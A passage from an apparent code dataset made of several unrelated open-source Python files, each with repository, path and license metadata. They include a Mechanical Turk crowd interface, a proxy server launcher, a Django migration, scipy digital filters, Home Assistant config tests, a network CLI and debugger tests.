fltuple=itertools.product(flnames,[sampling_rate],[read_dir],[out_dir],[key])
pool=mp.Pool(processes=num_proc)
pool.map(subsample_reads,fltuple)
# In[15]:
|
govinda-kamath/clustering_on_transcript_compatibility_counts
|
Zeisel_pipeline/sample_reads.py
|
Python
|
mit
| 1,955
|
import json
import pytz
from datetime import datetime
from django.conf import settings
from basecrowd.interface import CrowdInterface
from connection import create_hit, disable_hit, reject_assignment, bonus_worker, expire_hit
from connection import AMT_NO_ASSIGNMENT_ID
from models import Request
class AMTCrowdInterface(CrowdInterface):
@staticmethod
def validate_configuration(configuration):
# Validate the configuration specific to amt
try:
CrowdInterface.require_context(
configuration,
['sandbox'],
ValueError())
except ValueError:
return False
return True
@staticmethod
def create_task(configuration, content):
# Use the boto API to create an AMT HIT
additional_options = {'num_responses': configuration['num_assignments']}
additional_options.update(configuration['amt'])
return create_hit(additional_options)
@staticmethod
def pay_worker_bonus(worker_object, assignment_object, bonus_amount, reason):
bonus_worker(worker_object, assignment_object, bonus_amount, reason)
@staticmethod
def reject_task(assignment_object, worker_object, reason):
reject_assignment(assignment_object, reason)
@staticmethod
def expire_tasks(task_objects):
for task in task_objects:
expire_hit(task)
@staticmethod
def delete_tasks(task_objects):
# Use the boto API to delete the HITs
for task in task_objects:
disable_hit(task)
@staticmethod
def get_assignment_context(request):
request_data = request.GET if request.method == 'GET' else request.POST
# parse information from AMT in the URL
context = {
'task_id': request_data.get('hitId'),
'worker_id': request_data.get('workerId'),
'submit_url': request_data.get('turkSubmitTo'),
}
# check for requests for a preview of the task
assignment_id = request_data.get('assignmentId')
if assignment_id == AMT_NO_ASSIGNMENT_ID:
assignment_id = None
is_accepted = False
else:
is_accepted = True
context['assignment_id'] = assignment_id
context['is_accepted'] = is_accepted
# store the request if it has been accepted
if is_accepted:
Request.objects.create(
path=request.get_full_path(),
post_json=json.dumps(dict(request.GET.items() + request.POST.items())),
recv_time=pytz.utc.localize(datetime.now()))
return context
def get_frontend_submit_url(self, crowd_config):
return (settings.POST_BACK_AMT_SANDBOX
if crowd_config['sandbox'] else settings.POST_BACK_AMT)
AMT_INTERFACE = AMTCrowdInterface('amt')
|
amplab/ampcrowd
|
ampcrowd/amt/interface.py
|
Python
|
apache-2.0
| 2,871
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
import atexit
import config
import logging
from web.wsgi import application as web_application
from service import getService
from shadowsocks import eventloop, daemon
main_loop = None
opts = {
# 'daemon' : 'restart',
'pid-file': '/var/run/ssland.pid',
'log-file': '/var/log/ssland.log',
'no-http': False,
}
def print_help():
print('''usage: ssland [OPTION]
A multi-in-one proxy provider
Proxy options:
-d start/stop/restart daemon mode
-n , --no-http disable built-in http server
''')
def parse_opts():
import getopt
shortopts = "hnd:s"
longopts = ['help', 'no-http', 'daemon']
optlist, _ = getopt.getopt(sys.argv[1:], shortopts, longopts)
for key, value in optlist:
if key == '-h' or key == '--help':
print_help()
sys.exit(0)
elif key == '-n' or key == '--no-http':
opts['no-http'] = True
elif key == '-d' or key == '--daemon':
opts['daemon'] = value
def init_all_service():
from web.models import ProxyAccount
accounts = {} # "service": [account1, account2]
for ac in ProxyAccount.objects.filter(enabled=True, user__is_active=True).all():
name = ac.service
if not name in accounts: accounts[name] = []
accounts[name].append(ac.config)
for name, service_config in config.MODULES.iteritems():
if not name in accounts: accounts[name] = []
service = getService(name)
service.init(service_config)
service.start(accounts[name], event_loop=main_loop)
def kill_all_service():
for name in config.MODULES:
getService(name).stop()
if __name__ == "__main__":
parse_opts()
daemon.daemon_exec(opts)
if config.DEBUG:
logging.basicConfig(level=logging.DEBUG,
format='[%(asctime)s] %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
main_loop = eventloop.EventLoop()
init_all_service()
atexit.register(kill_all_service)
# WSGI App
# this is slow. consider uWSGI or other backend
if not opts['no-http']:
logging.info('Starting HTTP Server on %d', config.HTTP_PORT)
from core.httpserver import SlowHTTPServer
server = SlowHTTPServer(wsgi_app=web_application, port=config.HTTP_PORT)
server.add_to_loop(main_loop)
# Quota supervisor
from core.quota_supervisor import QuotaSupervisor
quota_supervisor = QuotaSupervisor()
quota_supervisor.add_to_loop(main_loop)
# start the event loop
main_loop.run()
|
laobubu/ssland
|
ssland.py
|
Python
|
mit
| 2,660
|
# Generated by Django 2.2.16 on 2021-03-10 12:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("parties", "0012_add_party_docs"),
("popolo", "0035_attach_memberships_to_posts"),
]
operations = [
migrations.AddField(
model_name="membership",
name="party_description",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="parties.PartyDescription",
help_text="The party description for this membership",
),
),
migrations.AddField(
model_name="membership",
name="party_description_text",
field=models.CharField(
blank=True,
max_length=800,
help_text="The text of the party description at the time of this membership. This is useful if the associated party description subsequently changed",
),
),
migrations.AddField(
model_name="membership",
name="party_name",
field=models.CharField(
blank=True,
max_length=255,
help_text="The name of the associated party at the time of this membership. This is useful if the associated party subsequently changed name",
),
),
]
|
DemocracyClub/yournextrepresentative
|
ynr/apps/popolo/migrations/0036_add_party_name_and_description.py
|
Python
|
agpl-3.0
| 1,497
|
# -*- Mode: Python; test-case-name: flumotion.test.test_ui_fgtk -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# Flumotion - a streaming media server
# Copyright (C) 2004,2005,2006,2007 Fluendo, S.L. (www.fluendo.com).
# All rights reserved.
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
# Licensees having purchased or holding a valid Flumotion Advanced
# Streaming Server license may use this file in accordance with the
# Flumotion Advanced Streaming Server Commercial License Agreement.
# See "LICENSE.Flumotion" in the source distribution for more information.
# Headers in this file shall remain intact.
"""
I am a collection of extended GTK widgets for use in Flumotion.
"""
import gobject
from kiwi.ui.widgets.checkbutton import ProxyCheckButton
from kiwi.ui.widgets.combo import ProxyComboBox
from kiwi.ui.widgets.entry import ProxyEntry
from kiwi.ui.widgets.radiobutton import ProxyRadioButton
from kiwi.ui.widgets.spinbutton import ProxySpinButton
__version__ = "$Rev$"
class FProxyComboBox(ProxyComboBox):
def set_enum(self, enum_class, value_filter=()):
"""
Set the given enum_class on the combobox.
As a side effect, this makes the combobox an enum-based one.
This also sets the combobox to the first enum value.
"""
values = []
for enum in enum_class:
# If values are specified, filter them out
if value_filter and not enum in value_filter:
continue
values.append((enum.nick, enum))
self.prefill(values)
class ProxyWidgetMapping:
# In PyGTK 2.4.0 gtk.glade.XML type_dict parameter is buggy
# If it can't find the name it raises a silent KeyError which
# will be raised at random point later (as soon some code call
# PyErr_Occurred()), to avoid this, we reimplement the function
# as it is internally, eg failback to the real GType, by doing
# this PyMapping_GetItemString will never set the error.
types = {'GtkCheckButton': ProxyCheckButton,
'GtkComboBox': FProxyComboBox,
'GtkEntry': ProxyEntry,
'GtkRadioButton': ProxyRadioButton,
'GtkSpinButton': ProxySpinButton}
def __getitem__(self, name):
if name in self.types:
return self.types[name]
else:
return gobject.type_from_name(name)
|
ylatuya/Flumotion
|
flumotion/ui/fgtk.py
|
Python
|
gpl-2.0
| 2,667
|
from django.contrib import admin
from django.contrib.sites.models import RequestSite, Site
from django.utils.translation import ugettext_lazy as _
from registration.models import RegistrationProfile
@admin.register(RegistrationProfile)
class RegistrationAdmin(admin.ModelAdmin):
actions = ['activate_users', 'resend_activation_email']
list_display = ('user', 'activation_key_expired')
raw_id_fields = ['user']
search_fields = ('user__username', 'user__first_name', 'user__last_name')
def activate_users(self, request, queryset):
"""
Activates the selected users, if they are not alrady
activated.
"""
for profile in queryset:
RegistrationProfile.objects.activate_user(profile.activation_key)
activate_users.short_description = _("Activate users")
def resend_activation_email(self, request, queryset):
"""
Re-sends activation emails for the selected users.
Note that this will *only* send activation emails for users
who are eligible to activate; emails will not be sent to users
whose activation keys have expired or who have already
activated.
"""
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
for profile in queryset:
if not profile.activation_key_expired():
profile.send_activation_email(site)
resend_activation_email.short_description = _("Re-send activation emails")
|
awakeup/django-registration
|
registration/admin.py
|
Python
|
bsd-3-clause
| 1,544
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_raises_rpc_error
class DeprecatedRpcTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [[], ["-deprecatedrpc=generate"]]
def skip_test_if_missing_module(self):
# The generate RPC method requires the wallet to be compiled
self.skip_if_no_wallet()
def run_test(self):
# This test should be used to verify correct behaviour of deprecated
# RPC methods with and without the -deprecatedrpc flags. For example:
#
# self.log.info("Make sure that -deprecatedrpc=createmultisig allows it to take addresses")
# assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, [self.nodes[0].getnewaddress()])
# self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
self.log.info("Test generate RPC")
assert_raises_rpc_error(-32, 'The wallet generate rpc method is deprecated', self.nodes[0].rpc.generate, 1)
self.nodes[1].generate(1)
if __name__ == '__main__':
DeprecatedRpcTest().main()
|
chaincoin/chaincoin
|
test/functional/rpc_deprecated.py
|
Python
|
mit
| 1,464
|
import pytest
import psi4
from forte.solvers import solver_factory, HF, ActiveSpaceSolver, SpinAnalysis
def test_aci_3():
"""Test FCI on H4/STO-3G. Reproduces the test aci-1"""
ref_hf_energy = -2.0310813811962456
ref_aci_energy = -2.115455548674
ref_acipt2_energy = -2.116454734743
spin_val = 1.02027340
# setup job
xyz = """
H -0.4 0.0 0.0
H 0.4 0.0 0.0
H 0.1 -0.3 1.0
H -0.1 0.5 1.0
"""
input = solver_factory(molecule=xyz, basis='cc-pVDZ')
state = input.state(charge=0, multiplicity=1, sym='a')
hf = HF(input, state=state, e_convergence=1.0e-12, d_convergence=1.0e-6)
options = {
'sigma': 0.001,
'active_ref_type': 'hf',
'diag_algorithm': 'SPARSE',
'active_guess_size': 300,
'aci_screen_alg': 'BATCH_HASH',
'aci_nbatch': 2
}
aci = ActiveSpaceSolver(hf, type='ACI', states=state, e_convergence=1.0e-11, r_convergence=1.0e-7, options=options)
spin = SpinAnalysis(aci, options={'SPIN_TEST': True})
spin.run()
# check results
assert hf.value('hf energy') == pytest.approx(ref_hf_energy, 1.0e-10)
assert aci.value('active space energy')[state] == pytest.approx([ref_aci_energy], 1.0e-9)
assert psi4.core.variable("ACI+PT2 ENERGY") == pytest.approx(ref_acipt2_energy, 1.0e-8)
assert psi4.core.variable("SPIN CORRELATION TEST") == pytest.approx(spin_val, 1.0e-7)
if __name__ == "__main__":
test_aci_3()
|
evangelistalab/forte
|
tests/pytest-methods/aci/test_aci-3.py
|
Python
|
lgpl-3.0
| 1,464
|
__author__ = 'aloriga'
from scipy import signal
import matplotlib.pyplot as plt
import numpy as np
#import pickle
from utils import SerializableObject
def plot_result(data, output=None):
plt.subplot(2, 1, 2)
plt.plot(data, 'b-', label='data')
if not output is None:
plt.plot(output, 'g-', linewidth=2, label='filtered data')
plt.grid()
plt.legend()
plt.subplots_adjust(hspace=0.35)
plt.show()
# Abstract class to create digital filters with a common interface
# All parameters should be passed via kwargs
class DigitalFilter(SerializableObject):
def __init__(self, **kwargs):
self.order = kwargs.get('order', 1)
self.start = kwargs.get('start', 0)
self.end = kwargs.get('end', 0)
self.filter_type = kwargs.get('filter_type', None)
self.fs = kwargs.get('fs', 1)
self.rp = kwargs.get('rp', 1)
self.rs = kwargs.get('rs', 1)
self.kernel_size = kwargs.get('kernel_size', 0)
self.no_nyq = kwargs.get('no_nyq', False)
self.description = 'Digital Filter'
self.num, self.den = self.create_filter()
def create_filter(self):
"""
Create filter
:return: tuple (numerator, denominator)
"""
return 0, 1
def apply(self, data):
"""
Apply filter to data
:param data: array to apply the filter
:return: array with new values
"""
return signal.lfilter(self.num, self.den, data)
def apply_forward_backward(self, data):
"""
Apply filter to data with forward-backward filter
:param data: array to apply the filter
:return: array with new values
"""
return signal.filtfilt(self.num, self.den, data)
def compute_freq_response(self):
return signal.freqz(self.num, self.den)
# Plot the response in frequency
def plot(self, print_phase=False):
"""
Plot the frequency response of the DigitalFilter
:param print_phase: boolean, if true phase response is plotted
:return:
"""
w, h = self.compute_freq_response()
fig = plt.figure()
plt.title('Digital filter frequency response')
ax1 = fig.add_subplot(111)
plt.plot(w, 20 * np.log10(abs(h)), 'b')
plt.ylim([-150, 10])
plt.ylabel('Amplitude [dB]', color='b')
plt.xlabel('Frequency [rad/sample]')
# plot lines -40dB
h_ref = np.array([100 for i in h])
plt.plot(w, -20 * np.log10(abs(h_ref)), 'r')
if print_phase:
ax2 = ax1.twinx()
angles = np.unwrap(np.angle(h))
plt.plot(w, angles, 'g')
plt.ylabel('Angle (radians)', color='g')
plt.grid()
plt.axis('tight')
plt.show()
# FILTERS DESIGN
# Common IIR Filters
class EllipticLow(DigitalFilter):
def create_filter(self):
self.description = 'Elliptinc Low Pass Filter:' + str(self.start)
self.filter_type = 'lowpass'
#Nyquist frequency
if not self.no_nyq:
nyq = 0.5 * self.fs
normal_cutoff = self.start / nyq
else:
normal_cutoff = self.start
return signal.ellip(self.order, self.rp, self.rs, normal_cutoff, self.filter_type)
class EllipticHigh(DigitalFilter):
def create_filter(self):
self.description = 'Elliptinc High Pass Filter:' + str(self.end)
self.filter_type = 'highpass'
if not self.no_nyq:
#Nyquist frequency
nyq = 0.5 * self.fs
normal_cutoff = self.end / nyq
else:
normal_cutoff = self.end
return signal.ellip(self.order, self.rp, self.rs, normal_cutoff, self.filter_type)
class EllipticBandPass(DigitalFilter):
def create_filter(self):
self.description = 'Elliptic Band Pass Filter:' + str(self.start) + '-' + str(self.end)
self.filter_type = 'bandpass'
if not self.no_nyq:
nyq = 0.5 * self.fs
normal_cutoff_start = self.start / nyq
normal_cutoff_end = self.end / nyq
else:
normal_cutoff_start = self.start
normal_cutoff_end = self.end
return signal.ellip(self.order, self.rp, self.rs, (normal_cutoff_start, normal_cutoff_end), self.filter_type)
class MedianFilter(DigitalFilter):
def apply(self, data):
if self.kernel_size:
return signal.medfilt(data, kernel_size=self.kernel_size)
else:
return signal.medfilt(data)
class ButterworthLow(DigitalFilter):
def create_filter(self):
self.description = 'Butterworth Low Pass Filter:' + str(self.start)
self.filter_type = 'lowpass'
if not self.no_nyq:
#Nyquist frequency
nyq = 0.5 * self.fs
normal_cutoff = self.start / nyq
else:
normal_cutoff = self.start
return signal.butter(self.order, normal_cutoff, self.filter_type)
class ButterworthHigh(DigitalFilter):
def create_filter(self):
self.description = 'Butterworth High Pass Filter:' + str(self.end)
self.filter_type = 'highpass'
if not self.no_nyq:
nyq = 0.5 * self.fs
normal_cutoff = self.end / nyq
else:
normal_cutoff = self.end
return signal.butter(self.order, normal_cutoff, self.filter_type)
class ButterworthBandPass(DigitalFilter):
def create_filter(self):
self.description = 'Butterworth Band Pass Filter: ' + str(self.start) + '-' + str(self.end)
self.filter_type = 'bandpass'
if not self.no_nyq:
nyq = 0.5 * self.fs
normal_cutoff_start = self.start / nyq
normal_cutoff_end = self.end / nyq
else:
normal_cutoff_start = self.start
normal_cutoff_end = self.end
return signal.butter(self.order, (normal_cutoff_start, normal_cutoff_end), self.filter_type)
class ChebyshevBandPass(DigitalFilter):
def create_filter(self):
self.description = 'Chebyshev Band Pass Filter: ' + str(self.start) + '-' + str(self.end)
self.filter_type = 'bandpass'
if not self.no_nyq:
nyq = 0.5 * self.fs
normal_cutoff_start = self.start / nyq
normal_cutoff_end = self.end / nyq
else:
normal_cutoff_start = self.start
normal_cutoff_end = self.end
return signal.cheby1(self.order, self.rp, (normal_cutoff_start, normal_cutoff_end), self.filter_type)
# FIR Filters
class FIRLowPassFilter(DigitalFilter):
def create_filter(self):
self.description = 'FIR Low Pass Filter: ' + str(self.start)
self.filter_type = 'bandpass'
nyq = 0.5 * self.fs
normal_cutoff_start = self.start / nyq
return signal.firwin(self.order+1, normal_cutoff_start), [1.0]
class FIRHighPassFilter(DigitalFilter):
def create_filter(self):
self.description = 'FIR High Pass Filter: ' + str(self.end)
self.filter_type = 'bandpass'
nyq = 0.5 * self.fs
normal_cutoff_end = self.end / nyq
return signal.firwin(self.order+1, normal_cutoff_end, pass_zero=False), [1.0]
class FIRBandPassFilter(DigitalFilter):
def create_filter(self):
self.description = 'FIR Band Pass Filter: ' + str(self.start) + '-' + str(self.end)
self.filter_type = 'bandpass'
nyq = 0.5 * self.fs
normal_cutoff_start = self.start / nyq
normal_cutoff_end = self.end / nyq
return signal.firwin(self.order+1, [normal_cutoff_start, normal_cutoff_end], pass_zero=False), [1.0]
# MULTIRATE FILTER BANK
class FilterBank(SerializableObject):
def __init__(self, filters, sampling_fs=44100):
"""
:param filters: dictionary, key: filter name, value: DigitalFilter
:param sampling_fs: sampling frequency
:return:
"""
# check if filters are DigitalFilter objects
assert reduce(lambda x, y: x and y, [isinstance(filters[f], DigitalFilter) for f in filters])
self.filters = filters
self.sampling_fs = sampling_fs
def apply(self, initial_data, resample=False):
"""
Apply all filters to data
:param initial_data: array to apply the filter
:param resample: boolean, if True resample method is applied. See multi-rate filtering
:return: data processed
"""
return self._apply_function(initial_data, resample, 'apply')
def apply_forward_backward(self, initial_data, resample=False):
"""
Apply all filters to data with backward-forward method
:param initial_data: array to apply the filter
:param resample: boolean, if True resample method is applied. See multi-rate filtering
:return: data processed
"""
return self._apply_function(initial_data, resample, 'apply_forward_backward')
def _apply_function(self, initial_data, resample, function):
output = {}
output_resampled = {}
nan_errors = []
for f in self.filters:
decimate_factor = self.sampling_fs/self.filters[f].fs
data = signal.decimate(initial_data, decimate_factor)
# apply function
output[f] = getattr(self.filters[f], function)(data)
# normalize output
output[f] = output[f]/max(output[f])
if resample:
# resample with FFT, it can be slow!
output_resampled[f] = signal.resample(output[f], len(initial_data))
if np.isnan(output[f]).any():
print f
nan_errors.append(f)
if nan_errors:
print 'Error Occurred: filters return NAN', nan_errors
return {}
else:
print 'DONE!'
return output_resampled if resample else output
|
neural22/scipy-audio-interface
|
digital_filter.py
|
Python
|
gpl-2.0
| 9,987
|
"""
Test that we work properly with classes with the trivial_abi attribute
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestTrivialABI(TestBase):
mydir = TestBase.compute_mydir(__file__)
NO_DEBUG_INFO_TESTCASE = True
@skipUnlessSupportedTypeAttribute("trivial_abi")
@expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr37995")
@expectedFailureAll(archs=["aarch64"], oslist=["linux"],
bugnumber="llvm.org/pr44161")
def test_call_trivial(self):
"""Test that we can print a variable & call a function with a trivial ABI class."""
self.build()
self.main_source_file = lldb.SBFileSpec("main.cpp")
self.expr_test(True)
@skipUnlessSupportedTypeAttribute("trivial_abi")
# fixed for SysV-x86_64 ABI, but not Windows-x86_64
@expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr36870")
@expectedFailureAll(archs=["aarch64"], oslist=["linux"],
bugnumber="llvm.org/pr44161")
@expectedFailureAll(archs=["arm64", "arm64e"], bugnumber="<rdar://problem/57844240>")
def test_call_nontrivial(self):
"""Test that we can print a variable & call a function on the same class w/o the trivial ABI marker."""
self.build()
self.main_source_file = lldb.SBFileSpec("main.cpp")
self.expr_test(False)
def check_value(self, test_var, ivar_value):
self.assertTrue(test_var.GetError().Success(), "Invalid valobj: %s"%(test_var.GetError().GetCString()))
ivar = test_var.GetChildMemberWithName("ivar")
self.assertTrue(test_var.GetError().Success(), "Failed to fetch ivar")
self.assertEqual(ivar_value, ivar.GetValueAsSigned(), "Got the right value for ivar")
def check_frame(self, thread):
frame = thread.frames[0]
inVal_var = frame.FindVariable("inVal")
self.check_value(inVal_var, 10)
options = lldb.SBExpressionOptions()
inVal_expr = frame.EvaluateExpression("inVal", options)
self.check_value(inVal_expr, 10)
thread.StepOut()
outVal_ret = thread.GetStopReturnValue()
self.check_value(outVal_ret, 30)
def expr_test(self, trivial):
(target, process, thread, bkpt) = lldbutil.run_to_source_breakpoint(self,
"Set a breakpoint here", self.main_source_file)
# Stop in a function that takes a trivial value, and try both frame var & expr to get its value:
if trivial:
self.check_frame(thread)
return
# Now continue to the same thing without the trivial_abi and see if we get that right:
threads = lldbutil.continue_to_breakpoint(process, bkpt)
self.assertEqual(len(threads), 1, "Hit my breakpoint the second time.")
self.check_frame(threads[0])
|
endlessm/chromium-browser
|
third_party/llvm/lldb/test/API/lang/cpp/trivial_abi/TestTrivialABI.py
|
Python
|
bsd-3-clause
| 2,923
|
"""Test hassbian config."""
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import config
from homeassistant.components.websocket_api.const import TYPE_RESULT
from homeassistant.const import CONF_UNIT_SYSTEM, CONF_UNIT_SYSTEM_IMPERIAL
from homeassistant.util import dt as dt_util, location
from tests.async_mock import patch
ORIG_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
@pytest.fixture
async def client(hass, hass_ws_client):
"""Fixture that can interact with the config manager API."""
with patch.object(config, "SECTIONS", ["core"]):
assert await async_setup_component(hass, "config", {})
return await hass_ws_client(hass)
async def test_validate_config_ok(hass, hass_client):
"""Test checking config."""
with patch.object(config, "SECTIONS", ["core"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
with patch(
"homeassistant.components.config.core.async_check_ha_config_file",
return_value=None,
):
resp = await client.post("/api/config/core/check_config")
assert resp.status == 200
result = await resp.json()
assert result["result"] == "valid"
assert result["errors"] is None
with patch(
"homeassistant.components.config.core.async_check_ha_config_file",
return_value="beer",
):
resp = await client.post("/api/config/core/check_config")
assert resp.status == 200
result = await resp.json()
assert result["result"] == "invalid"
assert result["errors"] == "beer"
async def test_websocket_core_update(hass, client):
"""Test core config update websocket command."""
assert hass.config.latitude != 60
assert hass.config.longitude != 50
assert hass.config.elevation != 25
assert hass.config.location_name != "Huis"
assert hass.config.units.name != CONF_UNIT_SYSTEM_IMPERIAL
assert hass.config.time_zone.zone != "America/New_York"
assert hass.config.external_url != "https://www.example.com"
assert hass.config.internal_url != "http://example.com"
await client.send_json(
{
"id": 5,
"type": "config/core/update",
"latitude": 60,
"longitude": 50,
"elevation": 25,
"location_name": "Huis",
CONF_UNIT_SYSTEM: CONF_UNIT_SYSTEM_IMPERIAL,
"time_zone": "America/New_York",
"external_url": "https://www.example.com",
"internal_url": "http://example.local",
}
)
msg = await client.receive_json()
assert msg["id"] == 5
assert msg["type"] == TYPE_RESULT
assert msg["success"]
assert hass.config.latitude == 60
assert hass.config.longitude == 50
assert hass.config.elevation == 25
assert hass.config.location_name == "Huis"
assert hass.config.units.name == CONF_UNIT_SYSTEM_IMPERIAL
assert hass.config.time_zone.zone == "America/New_York"
assert hass.config.external_url == "https://www.example.com"
assert hass.config.internal_url == "http://example.local"
dt_util.set_default_time_zone(ORIG_TIME_ZONE)
async def test_websocket_core_update_not_admin(hass, hass_ws_client, hass_admin_user):
"""Test core config fails for non admin."""
hass_admin_user.groups = []
with patch.object(config, "SECTIONS", ["core"]):
await async_setup_component(hass, "config", {})
client = await hass_ws_client(hass)
await client.send_json({"id": 6, "type": "config/core/update", "latitude": 23})
msg = await client.receive_json()
assert msg["id"] == 6
assert msg["type"] == TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == "unauthorized"
async def test_websocket_bad_core_update(hass, client):
"""Test core config update fails with bad parameters."""
await client.send_json({"id": 7, "type": "config/core/update", "latituude": 23})
msg = await client.receive_json()
assert msg["id"] == 7
assert msg["type"] == TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == "invalid_format"
async def test_detect_config(hass, client):
"""Test detect config."""
with patch(
"homeassistant.util.location.async_detect_location_info", return_value=None,
):
await client.send_json({"id": 1, "type": "config/core/detect"})
msg = await client.receive_json()
assert msg["success"] is True
assert msg["result"] == {}
async def test_detect_config_fail(hass, client):
"""Test detect config."""
with patch(
"homeassistant.util.location.async_detect_location_info",
return_value=location.LocationInfo(
ip=None,
country_code=None,
country_name=None,
region_code=None,
region_name=None,
city=None,
zip_code=None,
latitude=None,
longitude=None,
use_metric=True,
time_zone="Europe/Amsterdam",
),
):
await client.send_json({"id": 1, "type": "config/core/detect"})
msg = await client.receive_json()
assert msg["success"] is True
assert msg["result"] == {"unit_system": "metric", "time_zone": "Europe/Amsterdam"}
|
nkgilley/home-assistant
|
tests/components/config/test_core.py
|
Python
|
apache-2.0
| 5,282
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class AzureAsyncOperationResult(Model):
"""The response body contains the status of the specified asynchronous
operation, indicating whether it has succeeded, is in progress, or has
failed. Note that this status is distinct from the HTTP status code
returned for the Get Operation Status operation itself. If the asynchronous
operation succeeded, the response body includes the HTTP status code for
the successful request. If the asynchronous operation failed, the response
body includes the HTTP status code for the failed request and error
information regarding the failure.
:param status: Status of the Azure async operation. Possible values are:
'InProgress', 'Succeeded', and 'Failed'. Possible values include:
'InProgress', 'Succeeded', 'Failed'
:type status: str or :class:`NetworkOperationStatus
<azure.mgmt.network.models.NetworkOperationStatus>`
:param error:
:type error: :class:`Error <azure.mgmt.network.models.Error>`
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'Error'},
}
def __init__(self, status=None, error=None):
self.status = status
self.error = error
|
rjschwei/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/models/azure_async_operation_result.py
|
Python
|
mit
| 1,759
|
import sys
import gevent
from gevent import socket
import greentest
class Test(greentest.TestCase):
def start(self):
self.server = socket.socket()
self.server.bind(('127.0.0.1', 0))
self.server.listen(1)
self.server_port = self.server.getsockname()[1]
self.acceptor = gevent.spawn(self.server.accept)
def stop(self):
self.server.close()
self.acceptor.kill()
del self.acceptor
del self.server
def test(self):
self.start()
try:
sock = socket.socket()
sock.connect(('127.0.0.1', self.server_port))
try:
sock.settimeout(0.1)
try:
result = sock.recv(1024)
raise AssertionError('Expected timeout to be raised, instead recv() returned %r' % (result, ))
except socket.error:
ex = sys.exc_info()[1]
self.assertEqual(ex.args, ('timed out',))
self.assertEqual(str(ex), 'timed out')
self.assertEqual(ex[0], 'timed out')
finally:
sock.close()
finally:
self.stop()
if __name__ == '__main__':
greentest.main()
|
mgadi/naemonbox
|
sources/psdash/gevent-1.0.1/greentest/test__socket_timeout.py
|
Python
|
gpl-2.0
| 1,258
|
from .generic import *
from .auth import *
|
st4lk/django-relish
|
relish/decorators/__init__.py
|
Python
|
bsd-3-clause
| 43
|
"""Commands related to networks are in this module"""
import click
import sys
from hil.cli.client_setup import client
@click.group()
def network():
"""Commands related to network"""
@network.command(name='create', short_help='Create a new network')
@click.argument('network')
@click.argument('owner')
@click.option('--access', help='Projects that can access this network. '
'Defaults to the owner of the network')
@click.option('--net-id',
help='Network ID for network. Only admins can specify this.')
def network_create(network, owner, access, net_id):
"""Create a link-layer <network>. See docs/networks.md for details"""
if net_id is None:
net_id = ''
if access is None:
access = owner
client.network.create(network, owner, access, net_id)
@network.command(name='delete')
@click.argument('network')
def network_delete(network):
"""Delete a network"""
client.network.delete(network)
@network.command(name='show')
@click.argument('network')
def network_show(network):
"""Display information about network"""
q = client.network.show(network)
for item in q.items():
sys.stdout.write("%s\t : %s\n" % (item[0], item[1]))
@network.command(name='list')
def network_list():
"""List all networks"""
q = client.network.list()
for item in q.items():
sys.stdout.write('%s \t : %s\n' % (item[0], item[1]))
@network.command('list-attachments')
@click.argument('network')
@click.option('--project', help='Name of project.')
def list_network_attachments(network, project):
"""Lists all the attachments from <project> for <network>
If <project> is `None`, lists all attachments for <network>
"""
print client.network.list_network_attachments(network, project)
@network.command(name='grant-access')
@click.argument('network')
@click.argument('project')
def network_grant_project_access(project, network):
"""Add <project> to <network> access"""
client.network.grant_access(project, network)
@network.command(name='revoke-access')
@click.argument('network')
@click.argument('project')
def network_revoke_project_access(project, network):
"""Remove <project> from <network> access"""
client.network.revoke_access(project, network)
|
SahilTikale/haas
|
hil/cli/network.py
|
Python
|
apache-2.0
| 2,277
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""Utilities for testing the logging system (metrics, common logs)."""
import fcntl
import os
import sys
from queue import Queue
from threading import Thread
class Fifo:
"""Facility for creating and working with named pipes (FIFOs)."""
path = None
fifo = None
def __init__(self, path, blocking=False):
"""Create a new named pipe."""
if os.path.exists(path):
raise FileExistsError("Named pipe {} already exists.".format(path))
os.mkfifo(path)
if not blocking:
fd = os.open(path, os.O_NONBLOCK)
self.fifo = os.fdopen(fd, "r")
else:
self.fifo = open(path, "r", encoding='utf-8')
self.path = path
def sequential_reader(self, max_lines):
"""Return up to `max_lines` lines from a non blocking fifo.
:return: A list containing the read lines.
"""
return self.fifo.readlines()[:max_lines]
@property
def flags(self):
"""Return flags of the opened fifo.
:return An integer with flags of the opened file.
"""
fd = self.fifo.fileno()
return fcntl.fcntl(fd, fcntl.F_GETFL)
@flags.setter
def flags(self, flags):
"""Set new flags for the opened fifo."""
fd = self.fifo.fileno()
